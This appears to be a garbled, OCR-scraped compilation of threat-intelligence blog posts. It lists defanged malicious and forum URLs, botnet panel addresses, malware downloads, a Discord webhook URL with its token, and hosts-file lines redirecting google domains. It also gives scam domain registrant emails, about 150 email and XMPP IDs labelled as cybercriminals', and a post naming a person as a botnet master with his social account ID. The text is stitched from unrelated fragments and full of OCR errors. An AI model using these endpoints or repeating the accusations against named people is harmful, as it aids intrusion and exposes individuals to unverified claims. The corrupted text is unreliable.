hxxp://www.pnevmat.ru/catalog11-2.html 
hxxp://www.pneyman.com/newyork/images/day2/bullsmall.jpg 
hxxp://www.podrobnee.ru/spycams/2-kamera.html 
hxxp://www.point.ru/forecasts/2007/09/21/10983 
hxxp://www.politec.ru/hotel.asp?id=1329 
hxxp://www.pop-grafika.ru/music/ 
hxxp://www.pop-grafika.ru/music/doors/10-Dance.mp3 
hxxp://www.pornolize.com/ 
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hxxp://www.pornorap.ru).mpg 
hxxp://www.portal-on.ru/jabber/?q=content/faq/psi/pgp 
hxxp://www.postajobonline.com/employers/ 
hxxp://www.potentialbank.ru 

hxxp://www.potupa.net 
hxxp://www.powerzip.biz/down.aspx/PowerZipSetup.exe 
hxxp://www.pozitivtv.sp.ru/AMMbr.jpg 

hxxp://www.pradobank.ru 

hxxp://www.prap.ru/video pornorap -_ati-bati _(www.pornorap.ru).mpg 
hxxp://www.pravda.com.ua/ru/news/2008/8/1/79272.htm 
hxxp://www.prb.ru 

hxxp://www.pr-bank.ru 

hxxp://www.prbb.ru 

hxxp://www.preodbank.ru 

hxxp://www.president.gov.ua/news/?cat=56 
hxxp://www.prestigetime.com/images/watches/03.0240.4021.21.c495.jpg 
hxxp://www.pricegrabber.com/ 

hxxp://www.pricegrabber.com/search _getprod.php/masterid=2394071 
hxxp://www.pricegrabber.com/search _getprod.php/masterid=2519621 


hxxp://www.pricegrabber.com/search _getprod.php/masterid=3789775/search=Cano n 
%2020D 

hxxp://www.pricegrabber.com/search _getprod.php/masterid=632040/search=Sony 
%2520F717 

hxxp://www.pricegrabber.com/search _getprod.php/masterid=634354/search=kings — ton 
%20256mb 

hxxp://www.pricegrabber.com/search _getprod.php/masterid=851955/search=kings — ton 


%20512 

hxxp://www.prikols.com.ru/day/prikols com _ru _2001053.jpg 
hxxp://www.primbank.ru 

hxxp://www.primegroup.ru/ 

hxxp://www.priobye.ru 

hxxp://www.prioritetbank.ru 

hxxp://www.priovtb.com 

hxxp://www. priovtb.ru 

hxxp://www.privatbank.ru 


hxxp://www.privathb.ru 
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hxxp://www.prlog.org/10087220-gold-Itd-and-gold-silver-reserve-gsr-inc-b.. 
hxxp://www.procommercebank.ru 
hxxp://www.profitbank.ru 

hxxp://www.profit-bank.ru 
hxxp://www.prolightning.com/pic.jpg 
hxxp://www.prombank.ru 
hxxp://www.promenergobank.ru 
hxxp://www.promoteen.com/img/rekord/DimaBilan.jpg 
hxxp://www.promregion.ru 
hxxp://www.promsberbank.ru 
hxxp://www.promtorgbank.ru 
hxxp://www.promtransbank.ru 
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hxxp://www.ptsecurity.ru/download/Technology Overview _Intel SMEP and _partial bypass 
_on _Windows _8.pdf 
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hxxp://www.rbc.com/ 
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hxxp://www. youtube.com/watch?v=anEKOG8x5gM 
hxxp://www.youtube.com/watch?v=aP1qGYhW4BE &feature=related 
hxxp://www. youtube.com/watch?v=at-RmGhAnXc 
hxxp://www.youtube.com/watch?v=cOTpDxLfjHc &e 

hxxp://www. youtube.com/watch?v=c-7f6CC) rs &feature=related 
hxxp://www. youtube.com/watch?v=CdTIQ6BVlvw 
hxxp://www.youtube.com/watch?v=eEUGLKUBh _k &amp 
hxxp://www. youtube.com/watch?v=ERhJ13gs3YQ 

hxxp://www. youtube.com/watch?v=f6UPxdK65]U 

hxxp://www. youtube.com/watch?v=FefTCpQqFZE 

hxxp://www. youtube.com/watch?v=GOcAladRARU &feature=related 
hxxp://www. youtube.com/watch?v=gR2N42aShGc &feature=related 
hxxp://www. youtube.com/watch?v=Hib2KjPtGRw 


hxxp://www. youtube.com/watch?v=hQfOQOJEdtE &eurl=http %3A %2F %2Fblog %2Ewired 
%2Ecom %2Fdefense %2F2007 %2F10 %2Ftt %2Dtt %2Ehtm! 


hxxp://www. youtube.com/watch?v=hSmHkDLVqOc &amp 
hxxp://www. youtube.com/watch?v=h-YCO7E7gpQ &amp 
hxxp://www. youtube.com/watch?v=iFgBkr4xabg 
hxxp://www. youtube.com/watch?v=]JDaicPlgn9U 
hxxp://www. youtube.com/watch?v=kTYIEKQYHWY 
hxxp://www. youtube.com/watch?v=IMOAVOuzRDU 
hxxp://www.youtube.com/watch?v=|p8 _YnYfPvU 
hxxp://www.youtube.com/watch?v=M55287T _aes 
hxxp://www. youtube.com/watch?v=M55287T _aes &amp 
hxxp://www.youtube.com/watch?v=M9H _eNUWxWY 
hxxp://www. youtube.com/watch?v=mpLp170DrrA 
hxxp://www. youtube.com/watch?v=mYMST3ZDWQA 
hxxp://www. youtube.com/watch?v=nExb8ISDhFI 
hxxp://www. youtube.com/watch?v=ntzXo0lvD2M 
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64.86.16.97 google.co.kr 
64.86.16.97 google.co.Is 
64.86.16.97 google.co.ma 
64.86.16.97 google.co.nz 
64.86.16.97 google.co.tz 
64.86.16.97 google.co.ug 
64.86.16.97 google.co.uk 
64.86.16.97 google.co.za 
64.86.16.97 google.co.zm 
64.86.16.97 google.com 


peer snem besa eae 
Register Now 


Victoria T. 


66 | am searching for kind, sympathetic and 
feel legs person with sense of humor. 


Send message e 


2007-2009 Contact Us Register for free 


The historical OSINT paragraph mentioned that several of the scareware domains pushed 
during the past two weeks were responding to 62.90.136.237. This very same 62.90.136.207 
IP was hosting domains part of an [59]Ukrainian dating scam agency known as [60]Confiden- 
tial Connections earlier this year, whose spamming operations were linked to a [61]botnet 
involved in money mule recruitment activities. 


For the time being, the following dating scam domains are responding to the same IP: 
healthe-lovesite .com - Email: potenciallio@safe-mail.net 
love-isaclick .com - Email: potenciallio@safe-mail.net 
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hxxp://www.youtube.com/watch?v=oiBVIAtZopM 
hxxp://www.youtube.com/watch?v=omqRO3)BXgo 
hxxp://www.youtube.com/watch?v=o00dX89cBOQU 
hxxp://www.youtube.com/watch?v=p-EFdgy4tis 
hxxp://www.youtube.com/watch?v=PFqBtvLVRpY 
hxxp://www.youtube.com/watch?v=pr3D6 _Ifx5g &amp 
hxxp://www.youtube.com/watch?v=Q8-F-RWPv1U 
hxxp://www.youtube.com/watch?v=qIXkouiW4 _o 
hxxp://www.youtube.com/watch?v=R4cQ3BoHFas &amp 
hxxp://www.youtube.com/watch?v=ROQ _ceoWdQw &amp 
hxxp://www.youtube.com/watch?v=SmVAWKf]4Go 
hxxp://www.youtube.com/watch?v=t4DT3tQqgRM 
hxxp://www.youtube.com/watch?v=TpFxbsPFgjs 
hxxp://www.youtube.com/watch?v=T-TEacX9kwA &feature=related 
hxxp://www.youtube.com/watch?v=U7rCOyCTPSw &amp 
hxxp://www.youtube.com/watch?v=u7Y6d-BVwxk 
hxxp://www.youtube.com/watch?v=u8pfxXW7crEQ 
hxxp://www.youtube.com/watch?v=UeKD-LWjAKY 
hxxp://www.youtube.com/watch?v=VGV25M2kpfM 
hxxp://www.youtube.com/watch?v=vLjEFMy _tAE 
hxxp://www.youtube.com/watch?v=wWTzkD9MOsU 
hxxp://www.youtube.com/watch?v=XgCbdzhHpgw 
hxxp://www.youtube.com/watch?v=xrLJjzoVqwE 
hxxp://www.youtube.com/watch?v=XRVI4iQ2Nug 
hxxp://www.youtube.com/watch?v=Y9IHjbqlkm4 
hxxp://www.youtube.com/watch?v=YsixOME9UWs 
hxxp://www.youtube.com/watch?v=zWkKLiespTrA 
hxxp://www.ysb.ru 

hxxp://www.yvb.ru 
hxxp://www.zadira.net/2007/02/16/video _dnja.html 
hxxp://www.zambank.ru 

hxxp://www.zametok.net/ 
hxxp://www.zanorg.com/prodperso/jeuxchiants/doublejeu.swf 
hxxp://www.zaocrp.ru 


hxxp://www.zapad.ru 
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hxxp://www.zapsibkombank.ru 

hxxp://www.zarech.ru 

hxxp://www.zatobank.ru 
hxxp://www.zavtra.com.ua/news/1/45098/ 
hxxp://www.zawm.com.ua 
hxxp://www.zaycev.net/pages/1617/161761.shtml 
hxxp://www.zaycev.net/pages/79/7967.shtml 
hxxp://www.zaza.net.ua/forum/showthread.php?t=1273 
hxxp://www.zdelete.com/ 
hxxp://www.zelenograd.ru/news/view.php3?id=2341 
hxxp://www.zembank.ru 

hxxp://www.zemsky.ru 

hxxp://www.zemskybank.ru 

hxxp://www.zenit.ru 

hxxp://www.zerich.ru 
hxxp://www.zerodayinitiative.com/advisories/ZDI-08-021/ 
hxxp://www.zerodayinitiative.com/advisories/ZDI-09-086 
hxxp://www.zerodayinitiative.com/advisories/ZDI-09-087 
hxxp://www.zerodayinitiative.com/advisories/ZDI-09-088 
hxxp://www.zhilcredit.ru 
hxxp://www.ziggurat29.com/OVPNPPCAIpha/OVPNPPCAlpha.htm #files 
hxxp://www.zina.dj 

hxxp://www.ziraatbank.ru 

hxxp://www.zkb.ru 

hxxp://www.zolost.ru 
hxxp://www.zoovet.ru/forum/?tid=10 &amp 
hxxp://www.zoovet.ru/forum/index.php?tid=10 &amp 
hxxp://www.zug.com/pranks/credit/ 
hxxp://www.zug.com/pranks/outgoing/funk.html 
hxxp://www.zug.com/pranks/powerbook/ 
hxxp://www2.braingames.getput.com/nether/default.asp 
hxxp://www2.csoonline.com/blog _view.html?CID=25522 
hxxp://www2.ebay.com/aw/core/200804.shtml #2008-04-14114255 
hxxp://www3.pgz.economy.gov.ru/trade/view/purchase/general.html?id=108127 949 
hxxp://www4.bmo.com/francais/ 
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hxxp://www5602.uploading.com/get.php?c=KDQOE6GL &amp 


hxxp://www6.diebold.com/ficcdsvdoc/translate.asp?lang=024 &name=Russian 
age=russiantTitle.gif &bk=Opteva 


hxxp://www-download.1tv.ru/video/2006 _04/1904061503.asf 
hxxp://www-download.1tv.ru/video/2006 04/1904062107.asf 
hxxp://www-download.1tv.ru/video/2006 _05/1805060903.asf 
hxxp://wwws.ru.warnerbros.com/firewall/ 
hxxp://x802.putfile.com/videos/c8-30409202194.wmv 
hxxp://xakepy.ru/member.php?u=3660 
hxxp://xakepy.ru/showthread.php?t=18295 
hxxp://xbit.hotbox.ru/log.htm 
hxxp://x-change.ru/result.php?src cur=4 &amp 
hxxp://xcon.xfocus.net/XCon2010 ChenXie _EN.pdf 
hxxp://x-forum.ru/index.php?showtopic=1279 
hxxp://x-forum.ru/index.php?showtopic=1310 
hxxp://xn-l-4ga.no 

hxxp://xn-l-bfa.no 

hxxp://xS138.xs.to/xs138/09166/dc828.jpg 

hxxp://xsox.name 

hxxp://xxx.mrak-itt.org/1.jpg 
hxxp://xxxxx.addr.com/cgi-bin/envcheck.cgi 
hxxp://xylibox.blogspot.com/2011/08/cracking-spyeye-13x.html 
hxxp://yandex.ru/ 

hxxp://yandex.ru/yandsearch?stype=www &amp 
hxxp://yaplakal.com/ 

hxxp://yellsoft.net 

hxxp://yl18.net/0.js 
hxxp://yourfavorite.com/checkwriter/verify.htm 
hxxp://youtube.com/watch?v=317HluTrv80 
hxxp://youtube.com/watch?v=C8rjr4jmWwdo0 
hxxp://youtube.com/watch?v=DCqvYax]v24 
hxxp://youtube.com/watch?v=i0QUMLAJmQIw 
hxxp://youtube.com/watch?v=iSHdxenPNMU 
hxxp://youtube.com/watch?v=jsHZZA3RQ9...related &amp 
hxxp://youtube.com/watch?v=jsHzZA3R90g &amp 
hxxp://youtube.com/watch?v=LA4Xx5Noxyo 


&im- 
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hxxp://youtube.com/watch?v=mwi2kHmuiyw &amp 
hxxp://youtube.com/watch _fullscreen?video id=DeTGXMgh-qw &amp 
hxxp://zadorno.com/pic/270906/image _2.jpg 
hxxp://zapadlo.com/Camping _2002/combined/ 
hxxp://zapadlo.com/Ezra _wed/Resize %20of %20Potupa __Itkin.jpg 
hxxp://zapadlo.com/pohodaug01/ 
hxxp://zapadlo.com/pohodaug01/MVC-312F.JPG 
hxxp://zappinternet.com/index.php?video=hexJcaXgaP 


hxxp://zaufanatrzeciastrona.pl/post/smieszna-tylna-furtka-w-ruterach-linksysa 
prawdopodobnie-netgeara/ 


hxxp://zealtech.5u.com/i/mc. gif 

hxxp://zeitgeistmovie.com 

hxxp://zembank.kaluga.ru 

hxxp://zet.cc/milsan.jpg 

hxxp://zet.cc/unix/windows.jpg 

hxxp://zhivagobank.ru 
hxxp://ziza.ru/2006/05/17/yak-cup-cop-parvi-karidola-tyk-parivila-tic-tandula.h tml 
hxxp://ziza.ru/2006/08/30/zhest-uhodyaszeho-mesyaca.html 
hxxp://ziza.ru/2008/07/28/tjazhelye budni _posititelejj kluba 1 video.html 
hxxp://ziza.ru/other/032006/21/bear/bear comics0O1.jpg 
hxxp://ziza.ru/other/032006/21/bear/bear comics0O2.jpg 
hxxp://ziza.ru/other/122006/04/01 _milenio _71082.jpg 
hxxp://zonder-guns.narod.ru/pm-654k-1.jpg 


hxxp://zone.msn.com/en/bejeweled/holidayO4 game.htm 


hxxp://zoom.cnews.ru/common//img/uploaded/image _gallery//2005/08/10/tulipegodiamond 


_250.jpg 
hxxp://zoom.cnews.ru/ru/catalog/notebook/index.php?producer166=1362 &amp 
hxxp://zoom.cnews.ru/ru/publication/index.php?art id80=110 
hxxp://194.54.90.214:21332/ 

hxxp://194.54.90.214:21332/avc/avcheck.asp 
hxxp://194.54.90.214:21332/ccicq/cc.html 
hxxp://194.54.90.214:21332/common/getccicq.asp 


hxxp://2.bp.blogspot.com/-kJg807IYHzw/VxhMI1qBCrl/AAAAAAAAAFA/n-Uurll8q2EyyaU 


IYMwvgNjVdWA4iK7OgCLcB/s1600/schemel1.png 
hxxp://2018.group-ib.ru/agenda2018 
hxxp://205.209.188.40:21332/invite/ipage.pl 
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hxxp://205.209.188.40:21332/ndcr/clients.htm 
hxxp://205.209.188.40:21332/ndcr/doc.htm 
hxxp://205.209.188.40:21332/ndcr/ndcup140.exe 
hxxp://205.209.188.40:21332/ndcr/ndcup150.exe 
hxxp://213.155.7.24:21332/login.php 
hxxp://2ip.ru/whois 


hxxp://3.bp.blogspot.com/-isOSbEHim]4/VxhMveJsbSI/AAAAAAAAATFI/ARybq6yJS9UpLzn 
Mq16CO5byOHDYMICbwWCLcB/s1600/hp _printer.png 


hxxp://3.bp.blogspot.com/-w3cx94Zfs  _s/VxhMqCGgoxl/AAAAAAAAAfE/xdWhmcRfJt0l82 —- 
U4EcLqjfuGrh3kphbOACLcB/s1600/scheme2.png 


hxxp://65.75.191.180:21332/ndcr/doc.htm 
hxxp://65.75.191.180:21332/ndcr/ndcdoc.htm 
hxxp://67.117.89.30/cgi-bin/bbc?hxxp://www.google.de 
hxxp://69.3.107.240/cgi-bin/nph-proxy.cgi 
hxxp://access.gib.ru 
hxxp://adcenter.microsoft.com/ 
hxxp://adcenter.us.miva.com/login.aspx 
hxxp://admin.advertise.com/af/affiliate. pl 
hxxp://adwords.google.com/ 
hxxp://alliance-leicester.co.uk 
hxxp://amiunique.org/ 
hxxp://anonfiles.com/7fOODb87q1/Maza _txt 
hxxp://anonsurf.de/ 

hxxp://a-parser.com 


hxxp://api.somebank.com.ua/commgw/message/history?extClientId=3618336 &pageNum- 
ber=1 &pageSize=10 


hxxp://api.somebank.ua:8243/services/MobileGW.MobileGWHttpsSoap11Endpo int 
hxxp://api.wordpress.org/secret-key/1.1/salt/ 

hxxp://arxiv.org/abs/1705.07386 

hxxp://arxiv.org/pdf/1904.10600.pdf 

hxxp://arxiv.org/pdf/2006.08249.pdf 

hxxp://arxiv.org/pdf/2112.05719.pdf 

hxxp://arxiv.org/pdf/2201.09956.pdf 


hxxp://assets.documentcloud.org/documents/4598904/Special-Counsel-Indictment- —July-13- 
2018.pdf 


hxxp://assets.documentcloud.org/documents/6543391/ATFuzzer. pdf 
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hxxp://audiofingerprint.openwpm.com/ 
hxxp://auth.hotjobs.yahoo.com/hjbiz/authenticate.php 
hxxp://banking.blsk.de/cgi/anfang.cgi?KtoNr=Konto/Depot 
hxxp://banking.webmoney.ru 

hxxp://bankomat.cc/ 

hxxp://bankomat.sc/ 


hxxp://odnews24.com/bangladesh/2019/06/03/bangladesh-arrests-six-ukraine-na__ tionals-for- 
atm-fraud 


hxxp://bill.ccbill.com/jpost/approved.cgi 
hxxp://bit.ly/2L7 RNdw 
hxxp://black.mazafaka.info 
hxxp://blockchain-dns.info/ 


hxxp://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-wi thout-a- 
file.hAtm! 


hxxp://blog.malwarebytes.com/wp-content/uploads/2018/09/browlock custom _cursor.gif 


hxxp://blog.reversinglabs.com/blog/digital-certificates-impersonated-executiv eS-as- 
certificate-identity-fronts 


hxxp://blog.usa.gov/breaking-into-artificial-intelligence-meet-sam-the-chatbot 
hxxp://blogs.rsa.com/rsa-uncovers-boleto-fraud-ring-brazil 
hxxp://bpiassetmanagement.bpi.com.ph/ 

hxxp://bugzilla.mozilla.org/show _bug.cgi?id=376473 
hxxp://bugzilla.mozilla.org/show _bug.cgi?id=382686 

hxxp://cajamadrid.es 

hxxp://carding.pro/ru/vodke-carder-i-hacker-byt/ 


hxxp://cdn25.img.ria.ru/images/156064/29/1560642916 0:78:2731:1614 600x0 80 0 0O 
_0a2bc8012c56c7fc8f7 780953d52adab.jpg.webp 


hxxp://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.htm| 
hxxp://check.just-buy. it 

hxxp://check.just-buy. it/ 
hxxp://chrome.google.com/webstore/detail/line/menkifleemblimdogmoihpfopnpl ikde?hl=en 
hxxp://clicktopray.org/ 

hxxp://client.mdmbank.ru 
hxxp://code.google.com/p/google-security-research/issues/detail?id=456 
hxxp://codex.wordpress.org/Debugging _in WordPress 


hxxp://community.rapid7.com/community/infosec/blog/2017/08/09/remote-desktop- protocol- 
exposure 
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hxxp://conference.hitb.org/hitbsecconf2018ams/sessions/in-through-the-out-doo r- 
backdooring-cars-with-the-bicho/ 


hxxp://cryptome.org 


hxxp://cyberpolice.gov.ua/news/kiberpoliczejski-vyluchyly-z-nezakonnogo-obigu -bazy- 
personalnyx-danyx-ponad-miljoniv-osib-7493/ 


hxxp://cyberpolice.gov.ua/news/kiberpolicziya-prypynyla-diyalnist-odnogo-z-na_ jvidomishyx- 
majdanchykiv-u-darknet-iz-prodazhu-personalnyx-danyx-4672/ 


hxxp://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakera-u-zlami-bilshe-d — vox-tysyach- 
kompyuteriv-ukrayincziv-4967/ 


hxxp://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakersku-grupu-u-zamov nyx-zlamax- 
viddalenyx-serveriv-korystuvachiv-2163/ 


hxxp://cyberpolice.gov.ua/news/kiberpolicziya-zatrymala-organizatoriv-masshta bnoyi-sxemy- 
perereyestracziyi-areshtovanogo-majna-45/ 


hxxp://darkodod3sb4dapz.onion 

hxxp://darkodod3sb4dapz.onion.to/ 
hxxp://db.usenix.org/events/hotsec11/stream/cai/index.html 
hxxp://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortiga te-ssl-vpn/ 


hxxp://discord.com/api/webhooks/875931932360331294/wAOrLs3xX _2)JgqlfqEfpYoL9zer 
_Qs7hpsMbwaDI6-UByE ZRHiXmOt1lro 3RFBqBR 


hxxp://dl.acm.org/doi/10.1145/3485832.3485914 
hxxp://dl.acm.org/doi/pdf/10.1145/3485730.3485941 
hxxp://dnsflagday.net/ 


hxxp://docs.google.com/spreadsheets/d/13ebW7KpG3qhhTIczkKARNeOr1rH46t 
_UfolVqrBGPsRY/htmlview #gid=0 


hxxp://documents.trendmicro.com/assets/appendix-alice-lignhtweight-compact-atm -malware- 
2.pdf 


hxxp://download.vusec.net/papers/blindside _ccs20.pdf 
hxxp://drive.google.com/file/d/OBOKLoHg gR_XQnV4RVhINIS6GMHM/view 
hxxp://drive.google.com/file/d/ILmMULop1LxHjJy _uzVBdc _xFItN9ck04Jj/view 
hxxp://dtnet.getmyip.com/cgi-bin/nph-proxyc.cgi/111110A/jvvr/yyy.iqqing.fg/ 
hxxp://dweb.homeunix.org/cgi-bin/nph-proxyc.cgi/111110A/jvvr/yyy.iqqing.fg/ 
hxxp://ecorpl.evault.ws/ebc _ebc1961/ebc1961.asp?wci=process &amp 
hxxp://en.bitcoin.it/wiki/Script 
hxxp://en.wikipedia.org/wiki/Operation Paperclip 
hxxp://en.wikipedia.org/wiki/Parsing 
hxxp://en.wikipedia.org/wiki/Signalling System No. 7 
hxxp://en.wikipedia.org/wiki/V-2 _rocket 
hxxp://encrypted.google.com 
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hxxp://eprint.iacr.org/2019/459. pdf 
hxxp://etherscan.io/address/0x8c9a02c89c96940e37 7052a9be0c7326f89a2495 


hxxp://etherscan.io/tx/0xc215b9356db58ce05412439f49a842f8a3abe6c17 - 
92ff8f2c3ee425c3501023c 


hxxp://events.ccc.de/congress/2015/Fahrplan/system/event _attachments/attachments/000/002/81 7/orig- 
inal/151227.32C3-SRLabs-Shopshiftin g.v1.pdf 


hxxp://fe-acc18.ru/ 

hxxp://finedumps.com/ 

hxxp://firstlook.org/theintercept/ 

hxxp://forum.theftservices.com/ 

hxxp://fpcentral.irisa.fr/ 
hxxp://geminiadvisory.io/obreached-wawa-payment-card-records-reach-dark-web/ 
hxxp://geo.webmoney.ru/static/wmobjects _in _region-247.html 
hxxp://gist.github.com/cd789/bbc6a6fea4c22c10d7f3a57472f4a235 
hxxp://gist.github.com/testanull/0188clae847f37a70fe536123d14f398 
hxxp://github.com/adamcaudill/Psychson 
hxxp://github.com/Aekrasla/Updated-Carbanak-Source-with-Plugins 
hxxp://github.com/aguinet/wannakey 
hxxp://github.com/Allex/WindowsElevation/tree/master/CVE-2021-1732 
hxxp://github.com/avboy1337/1195777-chromeOday 
hxxp://github.com/BishopFox/sliver 
hxxp://github.com/boku7/CobaltStrikeReflectiveLoader 
hxxp://github.com/Cr4sh/IDA-UbiGraph 
hxxp://github.com/Cr4sh/ThinkPwn 

hxxp://github.com/doadam/ziVA 
hxxp://github.com/dotzero/Kingpin/blob/master/Kingpin. pdf 
hxxp://github.com/dotzero/Kingpin/raw/master/Kingpin.pdf 
hxxp://github.com/eelyvy/log4jshell-pdf 
hxxp://github.com/elvanderb/TCP-32764 
hxxp://github.com/embedi/DIR8xx _PoC/blob/master/hnap.py 
hxxp://github.com/embedi/DIR8xx _PoC/blob/master/phpcgi.py 
hxxp://github.com/embedi/DIR8xx _PoC/blob/master/update.sh 


hxxp://github.com/exodusintel/Chrome-Issue-992914-Sealed-Frozen-Element-Kind- Type- 
Confusion-RCE-Exploit/tree/master/chrome _992914 


hxxp://github.com/Freakboy/CobaltStrike 
hxxp://github.com/google/log4jscanner 
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hxxp://github.com/greenboxal/emv-kernel 
hxxp://github.com/hexway/apple _bleee 
hxxp://github.com/hexway/r00kie-kr0Okie 
hxxp://github.com/horizon3ai/CVE-2021-38647 
hxxp://github.com/IAIK/jstemplate 
hxxp://github.com/initstring/dirty sock 
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19.8.11 Exposing a Currently Active Personally Identifiable Cybercriminals 
XMPP/Jabber Account IDs Portfolio - Part Three (2023-08-21 12:23) 
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Folks, 


This is the third part of the blog posts series where I’m actively data mining publicly and private 
invite only cybercrime-friendly communities looking for personally identifiable email address 
accounts and XMPP/Jabber account IDs with the idea to assist everyone on their way to properly 
do their research including the U.S Intelligence Community and U.S Law Enforcement on its way 
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iFud 


iHonker 
LinkFeed 
Linuxac.org 
Master-X 
MasterWebs 
MaulTalk 
Mmpg.ru 


Mr11-11mr.7olm.org 


Nullnoss.org 


pay-per-install_org 


PhreakerPro 
Piratebuhta.pw 
ProCrd 
ProLogic 
Promarket 
ProxyBase 
scamwarners 
SEOCafe 
SEOForum 


ShadowMarket 
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TotalBlackhat 
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www.opensc.ws 
Xakep.bg 
Xakepok 
Zismo 


to properly track down and monitor the individuals behind these campaigns. 


Sample XMPP/Jabber account IDs include: 


1289ijay@gmail.com 
283285287@protonmail.com 
8888 @thesecure. biz 
abchospitalet@abcgrup.com 


akshayvalunj7469@gmail.com 


algemeenspam@gmail.com 


alphv@01337.ru 


amar.u1510@gmail.com 


andy.tetley@gmail.com 


antonio@crescimanna.net 


antoniomarcosO3@gmail.com 


antonuemad@gmail.com 


anupam.makum@gmail.com 
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5.11.4 Koobface Botnet’s Scareware Business Model - Part Two (2009-11-11 19:03) 


Stan tp | Quchist tip | Loan 


Video posted by * Tiger * 


ue ocoroco te a CS 


Video Responses: 10 Text Comments: 70 


Would you like to comment? 


unt, Of gon in f you are abou 


UPDATED - Wednesday, November 18, 2009: A [1]new update is pushed to the hundreds 
of thousands infected hosts, which is now performing the redirection using dynamically 
generated .swf files, with every page using the same title "Wonderful Video". The redirection 
is also a relatively static process. 


For instance, if the original koobface redirector is koobface.infected.host/301, followed 
by the .swf redirection it will output koobface.infected.host/301/?go. 


New redirectors and scareware domains pushed within the past few hours include - everlast- 
movie .cn - Email: gmk2000@yahoo.com; smile-life .cn - Email: gmk2000@yahoo.com ; harry- 
pott .cn - Email: gmk2000@yahoo.com, [2]beprotected9 .com - Email: essi@calinsella.eu and 
[3Jantivir3 .com - Email: essi@calinsella.eu. 
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arslanyousaff@gmail.com 
arunprakashnetwork29@gmail.com 
asbjorn.lund.vestergaard@gmail.com 
aspiring.pentesterl1@gmail.com 
avenstewart@gmail.com 
avos@strong.pm 
avos@thesecure. biz 
badaveapurval@gmail.com 
belay17@hotmail.com 
belial-demons@exploit.im 
belial-demons@thesecure.biz 
big-bro@exploit.im 
blackbytesuppOrt@onionmail.org 
blackcOd3@protonmail.com 
blocklocmedia@gmail.com 
br0k3r@xmpp.jp 
bratva@xmpp.cx 
britekingb@gmail.com 
camilonavarreteportino@gmail.com 
ccarterdev@gmail.com 
colucbuon222@gmail.com 
compras.baleares@teclisa.com 
consult@1ljabber.com 
contact@moses-staff.se 
cuongjkne@gmail.com 
cypher@jabb3r.org 
darkswan@jabber.ru 
dataman@Oday.im 
dataman@rows.im 
derision.t@gmail.com 
dhuciney@gmail.com 
dzmitry.lukyanenka@gmail.com 
Ekwunifel5@gmail.com 
engfog1337@gmail.com 


epiceliteyt@calyxinstitute.org 
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epiceliteyt@jabber.calyxinstitute.org 
epiceliteyt@jabberix.com 
ergenekon@jabbim.ru 
erica@4dshop.com 
esfinterO@gmail.com 
f.cibien@gmail.com 
froggy8x@gmail.com 
gasbo52@yahoo.com 
gautamjajwlya@gmail.com 
geral@tracoactual.com 
goyoguy1234@gmail.com 
hack3dlikeapro@proton.me 
harsh2astrotech@gmail.com 
hassanelhoseny63@gmail.com 
hippiejam@hotmail.com 
hzllaga@gmail.com 
Ig-dongremayur777@gmail.com 
iludecosevilla@hotmail.com 
indalica@gruponovelec.com 
ira2429@yahoo.com 
isjuye@gmail.com 
jantonio.rea@gmail.com 
Jareddarkweb@gmail.com 
Jassimar777@gmail.com 
jatinjenal1l11@gmail.com 
joelmathewbethel@gmail.com 
kotiki@exploit.im 
law7@verizon.net 
Icmays@aol.com 
learnharshnew@gmail.com 
leopoldo787@exploit.im 
lonnieastory@gmail.com 
lusi@exploit.im 
mallox@exploit.im 
malvulnl13@gmail.com 
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matt.j.voss@gmail.com 
matteopara@gmail.com 
maxciencomp@gmail.com 
michaeljonstevenson@gmail.com 
midatlanticbeauty@hotmail.com 
miguelpiccirillol 7@gmail.com 
mikes53976@aol.com 
miscellaneous.ggg@gmail.com 
mitchellgoffpc@gmail.com 
moinkhanemon1997@gmail.com 
mommy.jan@comcast.net 
mssp@thesecure.biz 
narek1lLharutyunyan@gmail.com 
neizvestnost74@exploit.im 
nicolasgomez.neg@gmail.com 
nihateliyev203@gmail.com 
nirvaxal@gmail.com 

No ESCAPE@exploit.im 
ntooperstore@gmail.com 
offdgrid187@xmpp.jp 
ootkiller@thesecure. biz 
oshinjainrocks@gmail.com 
parkerbrothers66@gmail.com 
pay2key@tuta.io 
pharos@jabb.im 
piratnetworks@jabb.im 
princewael100@gmail.com 
processor@thesecure.biz 
pseudobytes@gmail.com 
qzsuel3@yahoo.com 
rakeshlal.591c@gmail.com 
rama.krish36@gmail.com 
revanthshiva3@gmail.com 
rickmuz@yahoo.com 


robert.shoffner@gmail.com 


28015 


roki_h@yahoo.com 
rootbytemx@gmail.com 
rootkiller@jabbim.com 
rootkiller@thesecure.biz 
roshan.shrestha4u@gmail.com 
rsmbloqueador@gmail.com 
rwxrwxs@gmail.com 
santanadacruz2001@gmail.com 
sedmice@5222.de 
segrastreamento@hotmail.com 
seize@Oday.im 
serialwaffle.bb@gmail.com 
seth@thesecure.biz 
shriyan2001@gmail.com 
skloveyou@yax.im 
starspentest team@exploit.im 
stevestewart88@gmail.com 
stormouss21@dnmx.org 
support24@thesecure.biz 
sylphNOva1337@protonmail.ch 
test@snai.com 
testsocks@faceless.cc 
thomson.nj@gmail.com 
tooperstore@gmail.com 
Tvister@jabberes.org 
vas.2Sam@gmail.com 
vent24tom12@gmail.com 
vicesociety@onionmail.org 
Vism@thesecure.biz 
v-society.official@onionmail.org 
vuldb@securityfocus.com 
wizard@thesecure. biz 
willberich@thesecure.biz 
yarabotyaga@jabster.pl 
ymaulanal0@gmail.com 
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young tx _bi@hotmail.com 
yuvalyoav7@gmail.com 
zhoua.dev@gmail.com 
Stay tuned! 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEifks2zmhbWcRuSxH9xF- d0qS4VXHtV5qUCO j Jnc4N-Hykbm 
QCgivi127zj6bOZWNdNWqSNTLTuVSAGKVSYTAc4-UXV-KxRGc_ZRD 


19.8.12 Where Is Anton Nikolaevich Korotchenko (AHTOoH Hukonaesuy KopoTueHko) 
Also Known as Koobface Botnet Master KrotReal? (2023-08-21 14:19) 


Who’s aware of his new VK.com account? Here’s [1]his user ID: mb9911 which | obtained using 
public sources. Happy research. 


Sample photos: 
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[3] 


[4] 
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[5] 


28019 


[6] 
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] 


2 


[ 
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] 


9 


[ 
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UPDATED - Tuesday, November 17, 2009: Koobface is [4]resuming scareware (Inst _312s2.exe) 
operations at [5]91.212.107.103 which was taken offline for a short period of time. ISP has 
